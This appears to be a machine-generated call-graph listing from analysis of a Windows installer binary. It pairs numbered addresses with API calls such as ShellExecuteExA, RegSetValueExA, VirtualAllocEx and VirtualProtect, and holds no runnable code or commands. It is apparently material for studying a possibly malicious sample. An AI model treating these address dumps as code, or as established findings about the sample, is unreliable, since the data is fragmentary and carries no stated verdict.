4921->4917 4922->4917 4923->4917 4924->4917 4925 401fcb 4926 402bce 17 API calls 4925->4926 4927 401fd2 4926->4927 4928 40646b 2 API calls 4927->4928 4929 401fd8 4928->4929 4930 401fea 4929->4930 4932 406055 wsprintfA 4929->4932 4932->4930 4399 4014d6 4400 402bac 17 API calls 4399->4400 4401 4014dc Sleep 4400->4401 4403 402a5a 4401->4403 4416 401759 4417 402bce 17 API calls 4416->4417 4418 401760 4417->4418 4419 401786 4418->4419 4420 40177e 4418->4420 4457 4060f7 lstrcpynA 4419->4457 4456 4060f7 lstrcpynA 4420->4456 4423 401784 4427 4063d2 5 API calls 4423->4427 4424 401791 4425 405a8f 3 API calls 4424->4425 4426 401797 lstrcatA 4425->4426 4426->4423 4440 4017a3 4427->4440 4428 40646b 2 API calls 4428->4440 4429 4017e4 4430 405c6b 2 API calls 4429->4430 4430->4440 4432 4017ba CompareFileTime 4432->4440 4433 40187e 4434 40521e 24 API calls 4433->4434 4437 401888 4434->4437 4435 40521e 24 API calls 4445 40186a 4435->4445 4436 4060f7 lstrcpynA 4436->4440 4438 4030d8 31 API calls 4437->4438 4439 40189b 4438->4439 4441 4018af SetFileTime 4439->4441 4443 4018c1 CloseHandle 4439->4443 4440->4428 4440->4429 4440->4432 4440->4433 4440->4436 4442 40618a 17 API calls 4440->4442 4451 405813 MessageBoxIndirectA 4440->4451 4454 401855 4440->4454 4455 405c90 GetFileAttributesA CreateFileA 4440->4455 4441->4443 4442->4440 4444 4018d2 4443->4444 4443->4445 4446 4018d7 4444->4446 4447 4018ea 4444->4447 4449 40618a 17 API calls 4446->4449 4448 40618a 17 API calls 4447->4448 4452 4018f2 4448->4452 4450 4018df lstrcatA 4449->4450 4450->4452 4451->4440 4452->4445 4453 405813 MessageBoxIndirectA 4452->4453 4453->4445 4454->4435 4454->4445 4455->4440 4456->4423 4457->4424 4933 401959 4934 402bac 17 API calls 4933->4934 4935 401960 4934->4935 4936 402bac 17 API calls 4935->4936 4937 40196d 4936->4937 4938 402bce 17 API calls 4937->4938 4939 401984 lstrlenA 4938->4939 4941 401994 4939->4941 4940 4019d4 4941->4940 4945 4060f7 lstrcpynA 4941->4945 4943 4019c4 4943->4940 4944 4019c9 lstrlenA 4943->4944 4944->4940 4945->4943 4946 40535c 4947 405507 4946->4947 4948 40537e GetDlgItem GetDlgItem GetDlgItem 4946->4948 4950 405537 4947->4950 4951 40550f GetDlgItem CreateThread CloseHandle 4947->4951 4991 4041b0 SendMessageA 4948->4991 4953 405586 4950->4953 4954 40554d ShowWindow ShowWindow 4950->4954 4956 405565 4950->4956 4951->4950 4952 4053ee 4957 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4952->4957 4961 4041e2 8 API calls 4953->4961 4993 4041b0 SendMessageA 4954->4993 4955 4055c0 4955->4953 4966 4055cd SendMessageA 4955->4966 4956->4955 4959 405575 4956->4959 4960 405599 ShowWindow 4956->4960 4964 405463 4957->4964 4965 405447 SendMessageA SendMessageA 4957->4965 4994 404154 4959->4994 4962 4055b9 4960->4962 4963 4055ab 4960->4963 4968 405592 4961->4968 4970 404154 SendMessageA 4962->4970 4969 40521e 24 API calls 4963->4969 4971 405476 4964->4971 4972 405468 SendMessageA 4964->4972 4965->4964 4966->4968 4973 4055e6 CreatePopupMenu 4966->4973 4969->4962 4970->4955 4975 40417b 18 API calls 4971->4975 4972->4971 4974 40618a 17 API calls 4973->4974 4976 4055f6 AppendMenuA 4974->4976 4977 405486 4975->4977 4978 405614 GetWindowRect 4976->4978 4979 405627 TrackPopupMenu 4976->4979 4980 4054c3 GetDlgItem SendMessageA 4977->4980 4981 40548f ShowWindow 4977->4981 4978->4979 4979->4968 4983 405643 4979->4983 4980->4968 4982 4054ea SendMessageA SendMessageA 4980->4982 4984 4054a5 ShowWindow 4981->4984 4986 4054b2 4981->4986 4982->4968 4985 405662 SendMessageA 4983->4985 4984->4986 4985->4985 4988 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4985->4988 4992 4041b0 SendMessageA 4986->4992 4989 4056a1 SendMessageA 4988->4989 4989->4989 4990 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4989->4990 4990->4968 4991->4952 4992->4980 4993->4956 4995 404161 SendMessageA 4994->4995 4996 40415b 4994->4996 4995->4953 4996->4995 4997 40275d 4998 402763 4997->4998 4999 402a5a 4998->4999 5000 40276b FindClose 4998->5000 5000->4999 5001 401a5e 5002 402bac 17 API calls 5001->5002 5003 401a67 5002->5003 5004 402bac 17 API calls 5003->5004 5005 401a0e 5004->5005 5006 40495e 5007 40498a 5006->5007 5008 40496e 5006->5008 5010 404990 SHGetPathFromIDListA 5007->5010 5011 4049bd 5007->5011 5017 4057f7 GetDlgItemTextA 5008->5017 5013 4049a0 5010->5013 5014 4049a7 SendMessageA 5010->5014 5012 40497b SendMessageA 5012->5007 5016 40140b 2 API calls 5013->5016 5014->5011 5016->5014 5017->5012 5018 4029de 5019 406500 5 API calls 5018->5019 5020 4029e5 5019->5020 5021 402bce 17 API calls 5020->5021 5022 4029ee 5021->5022 5023 402a2a 5022->5023 5028 40614a 5022->5028 5025 4029fc 5025->5023 5032 406134 5025->5032 5029 406155 5028->5029 5030 406178 IIDFromString 5029->5030 5031 406171 5029->5031 5030->5025 5031->5025 5035 406119 WideCharToMultiByte 5032->5035 5034 402a1d CoTaskMemFree 5034->5023 5035->5034 5036 4027df 5037 402bce 17 API calls 5036->5037 5039 4027ed 5037->5039 5038 402803 5040 405c6b 2 API calls 5038->5040 5039->5038 5041 402bce 17 API calls 5039->5041 5042 402809 5040->5042 5041->5038 5064 405c90 GetFileAttributesA CreateFileA 5042->5064 5044 402816 5045 402822 GlobalAlloc 5044->5045 5046 4028bf 5044->5046 5047 4028b6 CloseHandle 5045->5047 5048 40283b 5045->5048 5049 4028c7 DeleteFileA 5046->5049 5050 4028da 5046->5050 5047->5046 5065 403300 SetFilePointer 5048->5065 5049->5050 5052 402841 5053 4032ea ReadFile 5052->5053 5054 40284a GlobalAlloc 5053->5054 5055 402894 5054->5055 5056 40285a 5054->5056 5057 405d37 WriteFile 5055->5057 5058 4030d8 31 API calls 5056->5058 5059 4028a0 GlobalFree 5057->5059 5063 402867 5058->5063 5060 4030d8 31 API calls 5059->5060 5062 4028b3 5060->5062 5061 40288b GlobalFree 5061->5055 5062->5047 5063->5061 5064->5044 5065->5052 4671 4023e0 4672 402bce 17 API calls 4671->4672 4673 4023f1 4672->4673 4674 402bce 17 API calls 4673->4674 4675 4023fa 4674->4675 4676 402bce 17 API calls 4675->4676 4677 402404 GetPrivateProfileStringA 4676->4677 5066 4028e0 5067 402bac 17 API calls 5066->5067 5068 4028e6 5067->5068 5069 402925 5068->5069 5070 40290e 5068->5070 5079 4027bf 5068->5079 5071 40293f 5069->5071 5072 40292f 5069->5072 5073 402913 5070->5073 5074 402922 5070->5074 5076 40618a 17 API calls 5071->5076 5075 402bac 17 API calls 5072->5075 5080 4060f7 lstrcpynA 5073->5080 5081 406055 wsprintfA 5074->5081 5075->5079 5076->5079 5080->5079 5081->5079 5082 401b63 5083 402bce 17 API calls 5082->5083 5084 401b6a 5083->5084 5085 402bac 17 API calls 5084->5085 5086 401b73 wsprintfA 5085->5086 5087 402a5a 5086->5087 5088 401d65 5089 401d78 GetDlgItem 5088->5089 5090 401d6b 5088->5090 5092 401d72 5089->5092 5091 402bac 17 API calls 5090->5091 5091->5092 5093 401db9 GetClientRect LoadImageA SendMessageA 5092->5093 5094 402bce 17 API calls 5092->5094 5096 401e1a 5093->5096 5098 401e26 5093->5098 5094->5093 5097 401e1f DeleteObject 5096->5097 5096->5098 5097->5098 5099 4042e6 5100 4042fc 5099->5100 5107 404408 5099->5107 5104 40417b 18 API calls 5100->5104 5101 404477 5102 404541 5101->5102 5103 404481 GetDlgItem 5101->5103 5110 4041e2 8 API calls 5102->5110 5105 404497 5103->5105 5106 4044ff 5103->5106 5108 404352 5104->5108 5105->5106 5113 4044bd SendMessageA LoadCursorA SetCursor 5105->5113 5106->5102 5114 404511 5106->5114 5107->5101 5107->5102 5111 40444c GetDlgItem SendMessageA 5107->5111 5109 40417b 18 API calls 5108->5109 5112 40435f CheckDlgButton 5109->5112 5123 40453c 5110->5123 5132 40419d EnableWindow 5111->5132 5130 40419d EnableWindow 5112->5130 5136 40458a 5113->5136 5118 404517 SendMessageA 5114->5118 5119 404528 5114->5119 5118->5119 5119->5123 5124 40452e SendMessageA 5119->5124 5120 404472 5133 404566 5120->5133 5121 40437d GetDlgItem 5131 4041b0 SendMessageA 5121->5131 5124->5123 5127 404393 SendMessageA 5128 4043b1 GetSysColor 5127->5128 5129 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5127->5129 5128->5129 5129->5123 5130->5121 5131->5127 5132->5120 5134 404574 5133->5134 5135 404579 SendMessageA 5133->5135 5134->5135 5135->5101 5139 4057d9 ShellExecuteExA 5136->5139 5138 4044f0 LoadCursorA SetCursor 5138->5106 5139->5138 4719 40166a 4720 402bce 17 API calls 4719->4720 4721 401671 4720->4721 4722 402bce 17 API calls 4721->4722 4723 40167a 4722->4723 4724 402bce 17 API calls 4723->4724 4725 401683 MoveFileA 4724->4725 4726 401696 4725->4726 4732 40168f 4725->4732 4727 40646b 2 API calls 4726->4727 4730 4022e2 4726->4730 4729 4016a5 4727->4729 4728 401423 24 API calls 4728->4730 4729->4730 4731 405ed6 36 API calls 4729->4731 4731->4732 4732->4728 4733 40216b 4734 402bce 17 API calls 4733->4734 4735 402172 4734->4735 4736 402bce 17 API calls 4735->4736 4737 40217c 4736->4737 4738 402bce 17 API calls 4737->4738 4739 402186 4738->4739 4740 402bce 17 API calls 4739->4740 4741 402193 4740->4741 4742 402bce 17 API calls 4741->4742 4743 40219d 4742->4743 4744 4021df CoCreateInstance 4743->4744 4745 402bce 17 API calls 4743->4745 4748 4021fe 4744->4748 4750 4022ac 4744->4750 4745->4744 4746 401423 24 API calls 4747 4022e2 4746->4747 4749 40228c MultiByteToWideChar 4748->4749 4748->4750 4749->4750 4750->4746 4750->4747 5140 4022eb 5141 402bce 17 API calls 5140->5141 5142 4022f1 5141->5142 5143 402bce 17 API calls 5142->5143 5144 4022fa 5143->5144 5145 402bce 17 API calls 5144->5145 5146 402303 5145->5146 5147 40646b 2 API calls 5146->5147 5148 40230c 5147->5148 5149 402310 5148->5149 5150 40231d lstrlenA lstrlenA 5148->5150 5151 40521e 24 API calls 5149->5151 5154 402318 5149->5154 5152 40521e 24 API calls 5150->5152 5151->5154 5153 402359 SHFileOperationA 5152->5153 5153->5149 5153->5154 4760 40266d 4761 402bac 17 API calls 4760->4761 4766 402677 4761->4766 4762 4026e5 4763 405d08 ReadFile 4763->4766 4764 4026e7 4769 406055 wsprintfA 4764->4769 4765 4026f7 4765->4762 4768 40270d SetFilePointer 4765->4768 4766->4762 4766->4763 4766->4764 4766->4765 4768->4762 4769->4762 5155 40236d 5156 402387 5155->5156 5157 402374 5155->5157 5158 40618a 17 API calls 5157->5158 5159 402381 5158->5159 5159->5156 5160 405813 MessageBoxIndirectA 5159->5160 5160->5156 5161 4019ed 5162 402bce 17 API calls 5161->5162 5163 4019f4 5162->5163 5164 402bce 17 API calls 5163->5164 5165 4019fd 5164->5165 5166 401a04 lstrcmpiA 5165->5166 5167 401a16 lstrcmpA 5165->5167 5168 401a0a 5166->5168 5167->5168 5169 40296e 5170 402bac 17 API calls 5169->5170 5171 402974 5170->5171 5172 4029af 5171->5172 5173 402986 5171->5173 5175 4027bf 5171->5175 5174 40618a 17 API calls 5172->5174 5172->5175 5173->5175 5177 406055 wsprintfA 5173->5177 5174->5175 5177->5175 5178 6feb225a 5179 6feb22c4 5178->5179 5180 6feb22cf GlobalAlloc 5179->5180 5181 6feb22ee 5179->5181 5180->5179 5182 6feb1058 5184 6feb1074 5182->5184 5183 6feb10dc 5184->5183 5186 6feb1091 5184->5186 5195 6feb14bb 5184->5195 5187 6feb14bb GlobalFree 5186->5187 5188 6feb10a1 5187->5188 5189 6feb10a8 GlobalSize 5188->5189 5190 6feb10b1 5188->5190 5189->5190 5191 6feb10c6 5190->5191 5192 6feb10b5 GlobalAlloc 5190->5192 5194 6feb10d1 GlobalFree 5191->5194 5193 6feb14e2 3 API calls 5192->5193 5193->5191 5194->5183 5197 6feb14c1 5195->5197 5196 6feb14c7 5196->5186 5197->5196 5198 6feb14d3 GlobalFree 5197->5198 5198->5186 5199 4014f4 SetForegroundWindow 5200 402a5a 5199->5200 4806 402476 4807 402bce 17 API calls 4806->4807 4808 402488 4807->4808 4809 402bce 17 API calls 4808->4809 4810 402492 4809->4810 4823 402c5e 4810->4823 4813 402a5a 4814 4024c7 4816 4024d3 4814->4816 4819 402bac 17 API calls 4814->4819 4815 402bce 17 API calls 4818 4024c0 lstrlenA 4815->4818 4817 4024f5 RegSetValueExA 4816->4817 4820 4030d8 31 API calls 4816->4820 4821 40250b RegCloseKey 4817->4821 4818->4814 4819->4816 4820->4817 4821->4813 4824 402c79 4823->4824 4827 405fab 4824->4827 4828 405fba 4827->4828 4829 4024a2 4828->4829 4830 405fc5 RegCreateKeyExA 4828->4830 4829->4813 4829->4814 4829->4815 4830->4829 5201 402777 5202 40277d 5201->5202 5203 402781 FindNextFileA 5202->5203 5206 402793 5202->5206 5204 4027d2 5203->5204 5203->5206 5207 4060f7 lstrcpynA 5204->5207 5207->5206 5208 401ef9 5209 402bce 17 API calls 5208->5209 5210 401eff 5209->5210 5211 402bce 17 API calls 5210->5211 5212 401f08 5211->5212 5213 402bce 17 API calls 5212->5213 5214 401f11 5213->5214 5215 402bce 17 API calls 5214->5215 5216 401f1a 5215->5216 5217 401423 24 API calls 5216->5217 5218 401f21 5217->5218 5225 4057d9 ShellExecuteExA 5218->5225 5220 401f5c 5221 406575 5 API calls 5220->5221 5223 4027bf 5220->5223 5222 401f76 CloseHandle 5221->5222 5222->5223 5225->5220 5226 6feb15d1 5227 6feb14bb GlobalFree 5226->5227 5229 6feb15e9 5227->5229 5228 6feb162f GlobalFree 5229->5228 5230 6feb1604 5229->5230 5231 6feb161b VirtualFree 5229->5231 5230->5228 5231->5228 4831 401f7b 4832 402bce 17 API calls 4831->4832 4833 401f81 4832->4833 4834 40521e 24 API calls 4833->4834 4835 401f8b 4834->4835 4836 405796 2 API calls 4835->4836 4837 401f91 4836->4837 4838 401fb2 CloseHandle 4837->4838 4842 4027bf 4837->4842 4846 406575 WaitForSingleObject 4837->4846 4838->4842 4841 401fa6 4843 401fb4 4841->4843 4844 401fab 4841->4844 4843->4838 4851 406055 wsprintfA 4844->4851 4847 40658f 4846->4847 4848 4065a1 GetExitCodeProcess 4847->4848 4849 40653c 2 API calls 4847->4849 4848->4841 4850 406596 WaitForSingleObject 4849->4850 4850->4847 4851->4838 5232 401ffb 5233 402bce 17 API calls 5232->5233 5234 402002 5233->5234 5235 406500 5 API calls 5234->5235 5236 402011 5235->5236 5237 402029 GlobalAlloc 5236->5237 5239 402091 5236->5239 5238 40203d 5237->5238 5237->5239 5240 406500 5 API calls 5238->5240 5241 402044 5240->5241 5242 406500 5 API calls 5241->5242 5243 40204e 5242->5243 5243->5239 5247 406055 wsprintfA 5243->5247 5245 402085 5248 406055 wsprintfA 5245->5248 5247->5245 5248->5239 5249 4018fd 5250 401934 5249->5250 5251 402bce 17 API calls 5250->5251 5252 401939 5251->5252 5253 4058bf 67 API calls 5252->5253 5254 401942 5253->5254 5255 401000 5256 401037 BeginPaint GetClientRect 5255->5256 5257 40100c DefWindowProcA 5255->5257 5258 4010f3 5256->5258 5260 401179 5257->5260 5261 401073 CreateBrushIndirect FillRect DeleteObject 5258->5261 5262 4010fc 5258->5262 5261->5258 5263 401102 CreateFontIndirectA 5262->5263 5264 401167 EndPaint 5262->5264 5263->5264 5265 401112 6 API calls 5263->5265 5264->5260 5265->5264 5266 401900 5267 402bce 17 API calls 5266->5267 5268 401907 5267->5268 5269 405813 MessageBoxIndirectA 5268->5269 5270 401910 5269->5270 5271 404b80 GetDlgItem GetDlgItem 5272 404bd6 7 API calls 5271->5272 5278 404dfd 5271->5278 5273 404c72 SendMessageA 5272->5273 5274 404c7e DeleteObject 5272->5274 5273->5274 5275 404c89 5274->5275 5276 404cc0 5275->5276 5279 40618a 17 API calls 5275->5279 5280 40417b 18 API calls 5276->5280 5277 404edf 5281 404f8b 5277->5281 5286 404df0 5277->5286 5291 404f38 SendMessageA 5277->5291 5278->5277 5301 404e6c 5278->5301 5325 404ace SendMessageA 5278->5325 5284 404ca2 SendMessageA SendMessageA 5279->5284 5285 404cd4 5280->5285 5282 404f95 SendMessageA 5281->5282 5283 404f9d 5281->5283 5282->5283 5293 404fb6 5283->5293 5294 404faf ImageList_Destroy 5283->5294 5302 404fc6 5283->5302 5284->5275 5290 40417b 18 API calls 5285->5290 5288 4041e2 8 API calls 5286->5288 5287 404ed1 SendMessageA 5287->5277 5292 40518b 5288->5292 5306 404ce5 5290->5306 5291->5286 5296 404f4d SendMessageA 5291->5296 5297 404fbf GlobalFree 5293->5297 5293->5302 5294->5293 5295 40513f 5295->5286 5303 405151 ShowWindow GetDlgItem ShowWindow 5295->5303 5299 404f60 5296->5299 5297->5302 5298 404dbf GetWindowLongA SetWindowLongA 5300 404dd8 5298->5300 5311 404f71 SendMessageA 5299->5311 5304 404df5 5300->5304 5305 404ddd ShowWindow 5300->5305 5301->5277 5301->5287 5302->5295 5317 405001 5302->5317 5330 404b4e 5302->5330 5303->5286 5324 4041b0 SendMessageA 5304->5324 5323 4041b0 SendMessageA 5305->5323 5306->5298 5307 404dba 5306->5307 5310 404d37 SendMessageA 5306->5310 5312 404d75 SendMessageA 5306->5312 5313 404d89 SendMessageA 5306->5313 5307->5298 5307->5300 5310->5306 5311->5281 5312->5306 5313->5306 5315 40510b 5316 405115 InvalidateRect 5315->5316 5319 405121 5315->5319 5316->5319 5318 40502f SendMessageA 5317->5318 5321 405045 5317->5321 5318->5321 5319->5295 5339 404a89 5319->5339 5320 4050b9 SendMessageA SendMessageA 5320->5321 5321->5315 5321->5320 5323->5286 5324->5278 5326 404af1 GetMessagePos ScreenToClient SendMessageA 5325->5326 5327 404b2d SendMessageA 5325->5327 5328 404b25 5326->5328 5329 404b2a 5326->5329 5327->5328 5328->5301 5329->5327 5342 4060f7 lstrcpynA 5330->5342 5332 404b61 5343 406055 wsprintfA 5332->5343 5334 404b6b 5335 40140b 2 API calls 5334->5335 5336 404b74 5335->5336 5344 4060f7 lstrcpynA 5336->5344 5338 404b7b 5338->5317 5345 4049c4 5339->5345 5341 404a9e 5341->5295 5342->5332 5343->5334 5344->5338 5346 4049da 5345->5346 5347 40618a 17 API calls 5346->5347 5348 404a3e 5347->5348 5349 40618a 17 API calls 5348->5349 5350 404a49 5349->5350 5351 40618a 17 API calls 5350->5351 5352 404a5f lstrlenA wsprintfA SetDlgItemTextA 5351->5352 5352->5341 5353 401502 5354 40150a 5353->5354 5356 40151d 5353->5356 5355 402bac 17 API calls 5354->5355 5355->5356 5357 402604 5358 402bce 17 API calls 5357->5358 5359 40260b 5358->5359 5362 405c90 GetFileAttributesA CreateFileA 5359->5362 5361 402617 5362->5361 5363 401b87 5364 401b94 5363->5364 5365 401bd8 5363->5365 5368 401c1c 5364->5368 5372 401bab 5364->5372 5366 401c01 GlobalAlloc 5365->5366 5367 401bdc 5365->5367 5370 40618a 17 API calls 5366->5370 5376 402387 5367->5376 5384 4060f7 lstrcpynA 5367->5384 5369 40618a 17 API calls 5368->5369 5368->5376 5374 402381 5369->5374 5370->5368 5382 4060f7 lstrcpynA 5372->5382 5373 401bee GlobalFree 5373->5376 5374->5376 5377 405813 MessageBoxIndirectA 5374->5377 5377->5376 5378 401bba 5383 4060f7 lstrcpynA 5378->5383 5380 401bc9 5385 4060f7 lstrcpynA 5380->5385 5382->5378 5383->5380 5384->5373 5385->5376 4375 402588 4387 402c0e 4375->4387 4378 402bac 17 API calls 4379 40259b 4378->4379 4380 4025a9 4379->4380 4385 4027bf 4379->4385 4381 4025c2 RegEnumValueA 4380->4381 4382 4025b6 RegEnumKeyA 4380->4382 4383 4025de RegCloseKey 4381->4383 4384 4025d7 4381->4384 4382->4383 4383->4385 4384->4383 4388 402bce 17 API calls 4387->4388 4389 402c25 4388->4389 4390 405f7d RegOpenKeyExA 4389->4390 4391 402592 4390->4391 4391->4378 4392 401389 4394 401390 4392->4394 4393 4013fe 4394->4393 4395 4013cb MulDiv SendMessageA 4394->4395 4395->4394 4396 6feb2921 4397 6feb2971 4396->4397 4398 6feb2931 VirtualProtect 4396->4398 4398->4397 5386 40460d 5387 404639 5386->5387 5388 40464a 5386->5388 5447 4057f7 GetDlgItemTextA 5387->5447 5390 404656 GetDlgItem 5388->5390 5395 4046b5 5388->5395 5392 40466a 5390->5392 5391 404644 5394 4063d2 5 API calls 5391->5394 5397 40467e SetWindowTextA 5392->5397 5402 405b28 4 API calls 5392->5402 5393 404799 5445 404943 5393->5445 5449 4057f7 GetDlgItemTextA 5393->5449 5394->5388 5395->5393 5399 40618a 17 API calls 5395->5399 5395->5445 5400 40417b 18 API calls 5397->5400 5398 4047c9 5403 405b7d 18 API calls 5398->5403 5404 404729 SHBrowseForFolderA 5399->5404 5405 40469a 5400->5405 5401 4041e2 8 API calls 5406 404957 5401->5406 5407 404674 5402->5407 5408 4047cf 5403->5408 5404->5393 5409 404741 CoTaskMemFree 5404->5409 5410 40417b 18 API calls 5405->5410 5407->5397 5411 405a8f 3 API calls 5407->5411 5450 4060f7 lstrcpynA 5408->5450 5412 405a8f 3 API calls 5409->5412 5413 4046a8 5410->5413 5411->5397 5414 40474e 5412->5414 5448 4041b0 SendMessageA 5413->5448 5417 404785 SetDlgItemTextA 5414->5417 5422 40618a 17 API calls 5414->5422 5417->5393 5418 4046ae 5420 406500 5 API calls 5418->5420 5419 4047e6 5421 406500 5 API calls 5419->5421 5420->5395 5429 4047ed 5421->5429 5423 40476d lstrcmpiA 5422->5423 5423->5417 5426 40477e lstrcatA 5423->5426 5424 404829 5451 4060f7 lstrcpynA 5424->5451 5426->5417 5427 404830 5428 405b28 4 API calls 5427->5428 5430 404836 GetDiskFreeSpaceA 5428->5430 5429->5424 5432 405ad6 2 API calls 5429->5432 5434 404881 5429->5434 5433 40485a MulDiv 5430->5433 5430->5434 5432->5429 5433->5434 5435 404a89 20 API calls 5434->5435 5437 4048f2 5434->5437 5439 4048df 5435->5439 5436 404915 5452 40419d EnableWindow 5436->5452 5437->5436 5438 40140b 2 API calls 5437->5438 5438->5436 5441 4048f4 SetDlgItemTextA 5439->5441 5442 4048e4 5439->5442 5441->5437 5444 4049c4 20 API calls 5442->5444 5443 404931 5443->5445 5446 404566 SendMessageA 5443->5446 5444->5437 5445->5401 5446->5445 5447->5391 5448->5418 5449->5398 5450->5419 5451->5427 5452->5443 5453 401490 5454 40521e 24 API calls 5453->5454 5455 401497 5454->5455 5456 405192 5457 4051a2 5456->5457 5458 4051b6 5456->5458 5459 4051a8 5457->5459 5468 4051ff 5457->5468 5460 4051be IsWindowVisible 5458->5460 5464 4051d5 5458->5464 5462 4041c7 SendMessageA 5459->5462 5463 4051cb 5460->5463 5460->5468 5461 405204 CallWindowProcA 5465 4051b2 5461->5465 5462->5465 5466 404ace 5 API calls 5463->5466 5464->5461 5467 404b4e 4 API calls 5464->5467 5466->5464 5467->5468 5468->5461 5469 6feb1638 5470 6feb1667 5469->5470 5471 6feb1a98 18 API calls 5470->5471 5472 6feb166e 5471->5472 5473 6feb1681 5472->5473 5474 6feb1675 5472->5474 5476 6feb168b 5473->5476 5477 6feb16a8 5473->5477 5475 6feb1266 2 API calls 5474->5475 5486 6feb167f 5475->5486 5480 6feb14e2 3 API calls 5476->5480 5478 6feb16ae 5477->5478 5479 6feb16d2 5477->5479 5481 6feb1559 3 API calls 5478->5481 5482 6feb14e2 3 API calls 5479->5482 5483 6feb1690 5480->5483 5485 6feb16b3 5481->5485 5482->5486 5484 6feb1559 3 API calls 5483->5484 5487 6feb1696 5484->5487 5488 6feb1266 2 API calls 5485->5488 5489 6feb1266 2 API calls 5487->5489 5490 6feb16b9 GlobalFree 5488->5490 5491 6feb169c GlobalFree 5489->5491 5490->5486 5492 6feb16cd GlobalFree 5490->5492 5491->5486 5492->5486 4404 402516 4405 402c0e 17 API calls 4404->4405 4406 402520 4405->4406 4407 402bce 17 API calls 4406->4407 4408 402529 4407->4408 4409 402533 RegQueryValueExA 4408->4409 4412 4027bf 4408->4412 4410 402559 RegCloseKey 4409->4410 4411 402553 4409->4411 4410->4412 4411->4410 4415 406055 wsprintfA 4411->4415 4415->4410 5493 6feb103d 5496 6feb101b 5493->5496 5497 6feb14bb GlobalFree 5496->5497 5498 6feb1020 5497->5498 5499 6feb1027 GlobalAlloc 5498->5499 5500 6feb1024 5498->5500 5499->5500 5501 6feb14e2 3 API calls 5500->5501 5502 6feb103b 5501->5502 4458 40239c 4459 4023a4 4458->4459 4460 4023aa 4458->4460 4462 402bce 17 API calls 4459->4462 4461 4023ba 4460->4461 4463 402bce 17 API calls 4460->4463 4464 402bce 17 API calls 4461->4464 4466 4023c8 4461->4466 4462->4460 4463->4461 4464->4466 4465 402bce 17 API calls 4467 4023d1 WritePrivateProfileStringA 4465->4467 4466->4465 5503 6feb1837 5505 6feb185a 5503->5505 5504 6feb189c 5507 6feb1266 2 API calls 5504->5507 5505->5504 5506 6feb188a GlobalFree 5505->5506 5506->5504 5508 6feb1a1e GlobalFree GlobalFree 5507->5508 4468 40209d 4469 4020af 4468->4469 4478 40215d 4468->4478 4470 402bce 17 API calls 4469->4470 4471 4020b6 4470->4471 4473 402bce 17 API calls 4471->4473 4472 401423 24 API calls 4479 4022e2 4472->4479 4474 4020bf 4473->4474 4475 4020d4 LoadLibraryExA 4474->4475 4476 4020c7 GetModuleHandleA 4474->4476 4477 4020e4 GetProcAddress 4475->4477 4475->4478 4476->4475 4476->4477 4480 402130 4477->4480 4481 4020f3 4477->4481 4478->4472 4482 40521e 24 API calls 4480->4482 4483 402112 4481->4483 4484 4020fb 4481->4484 4485 402103 4482->4485 4489 6feb16db 4483->4489 4531 401423 4484->4531 4485->4479 4487 402151 FreeLibrary 4485->4487 4487->4479 4490 6feb170b 4489->4490 4534 6feb1a98 4490->4534 4492 6feb1712 4493 6feb1834 4492->4493 4494 6feb172a 4492->4494 4495 6feb1723 4492->4495 4493->4485 4568 6feb22f1 4494->4568 4584 6feb22af 4495->4584 4500 6feb178e 4506 6feb17dc 4500->4506 4507 6feb1794 4500->4507 4501 6feb1770 4597 6feb24d8 4501->4597 4502 6feb1759 4517 6feb174f 4502->4517 4594 6feb2cc3 4502->4594 4503 6feb1740 4505 6feb1746 4503->4505 4511 6feb1751 4503->4511 4505->4517 4578 6feb2a38 4505->4578 4509 6feb24d8 11 API calls 4506->4509 4616 6feb156b 4507->4616 4515 6feb17cd 4509->4515 4510 6feb1776 4608 6feb1559 4510->4608 4588 6feb26b2 4511->4588 4530 6feb1823 4515->4530 4622 6feb249e 4515->4622 4517->4500 4517->4501 4519 6feb24d8 11 API calls 4519->4515 4521 6feb1757 4521->4517 4523 6feb182d GlobalFree 4523->4493 4527 6feb180f 4527->4530 4626 6feb14e2 wsprintfA 4527->4626 4528 6feb1808 FreeLibrary 4528->4527 4530->4493 4530->4523 4532 40521e 24 API calls 4531->4532 4533 401431 4532->4533 4533->4485 4629 6feb1215 GlobalAlloc 4534->4629 4536 6feb1abf 4630 6feb1215 GlobalAlloc 4536->4630 4538 6feb1d00 GlobalFree GlobalFree GlobalFree 4539 6feb1d1d 4538->4539 4550 6feb1d67 4538->4550 4541 6feb20f1 4539->4541 4547 6feb1d32 4539->4547 4539->4550 4540 6feb1bbd GlobalAlloc 4558 6feb1aca 4540->4558 4542 6feb2113 GetModuleHandleA 4541->4542 4541->4550 4543 6feb2139 4542->4543 4544 6feb2124 LoadLibraryA 4542->4544 4637 6feb15c2 GetProcAddress 4543->4637 4544->4543 4544->4550 4545 6feb1c08 lstrcpyA 4549 6feb1c12 lstrcpyA 4545->4549 4546 6feb1c26 GlobalFree 4546->4558 4547->4550 4633 6feb1224 4547->4633 4549->4558 4550->4492 4551 6feb218a 4551->4550 4555 6feb2197 lstrlenA 4551->4555 4552 6feb1fb7 4636 6feb1215 GlobalAlloc 4552->4636 4638 6feb15c2 GetProcAddress 4555->4638 4556 6feb214b 4556->4551 4566 6feb2174 GetProcAddress 4556->4566 4558->4538 4558->4540 4558->4545 4558->4546 4558->4549 4558->4550 4558->4552 4559 6feb1ef9 GlobalFree 4558->4559 4560 6feb2033 4558->4560 4561 6feb1c64 4558->4561 4563 6feb1224 2 API calls 4558->4563 4559->4558 4560->4550 4565 6feb208c lstrcpyA 4560->4565 4561->4558 4631 6feb1534 GlobalSize GlobalAlloc 4561->4631 4562 6feb21b0 4562->4550 4563->4558 4565->4550 4566->4551 4567 6feb1fbf 4567->4492 4569 6feb230a 4568->4569 4571 6feb2446 GlobalFree 4569->4571 4573 6feb23b8 GlobalAlloc MultiByteToWideChar 4569->4573 4574 6feb1224 GlobalAlloc lstrcpynA 4569->4574 4575 6feb2405 4569->4575 4640 6feb12ad 4569->4640 4571->4569 4572 6feb1730 4571->4572 4572->4502 4572->4503 4572->4517 4573->4575 4576 6feb23e4 GlobalAlloc CLSIDFromString GlobalFree 4573->4576 4574->4569 4575->4571 4644 6feb2646 4575->4644 4576->4571 4581 6feb2a4a 4578->4581 4579 6feb2aef VirtualAllocEx 4580 6feb2b0d 4579->4580 4647 6feb29e4 4580->4647 4581->4579 4583 6feb2bd9 4583->4517 4585 6feb22c4 4584->4585 4586 6feb22cf GlobalAlloc 4585->4586 4587 6feb1729 4585->4587 4586->4585 